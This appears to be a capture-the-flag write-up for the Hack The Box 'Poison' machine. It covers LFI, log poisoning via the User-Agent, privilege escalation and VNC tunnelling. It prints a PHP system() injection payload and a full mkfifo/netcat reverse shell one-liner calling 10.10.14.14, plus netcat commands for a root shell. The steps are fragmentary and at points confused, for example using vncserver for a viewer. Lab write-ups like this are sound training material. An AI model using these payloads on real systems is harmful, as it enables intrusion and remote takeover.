POISON -Hack The Box Walk through
80 HTTP ENUMERATION
Also if you notice URL , LFI is possible
Cracking the password we found, by decoding it 13 times. First I was confused with rot13, but since this looked like a base64 hash, so I tried 13 times base64 decode.
SSH didn’t work, so I think LFI to Rce is the onme and only way
Checking http-error logs of apache24
capture on burp and send <system(id);?> in user-agent.
we see bad request. Let’s change request ,
It says cannot execute blank command, this is because we didn’t enter any command in url. Now we will request “id” in command.
Now is time to get shell. Using pentest monkeys amazing reverse shell cheatsheet
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 1234 >/tmp/f
And sending the request
Let’s try to switch to charix with password we got
we see secret.zip let’s copy it to our machine
On your machine
I used charix’s passwd here, we got earlier. If it would not have worked , I would have done zip2john
Enumerating network and ports listening on.
We see default port for VNC 5901 is used on localhost.
- Now we will do ssh tunneling such that connecting to our localhost at port 8081 , connects to poison’s localhost on port 5901
Now we connect to charix with dynamic port forwarded to 8081
Now we will connect to VNCviewer , using proxychains with passwd file secret. proxychains vncserver 127.0.0.1:5901 -passwd secret
2. You can also do it using SSH port forwarding in following manner.
ssh -L 8081:127.0.0.1:5901 email@example.com
then; vncserver -passwd secret
To root machine , run nc -nv 10.10.14.14 12345 and start netcat on your machine, so that you get root shell.
ROOTED!!! Not literally though.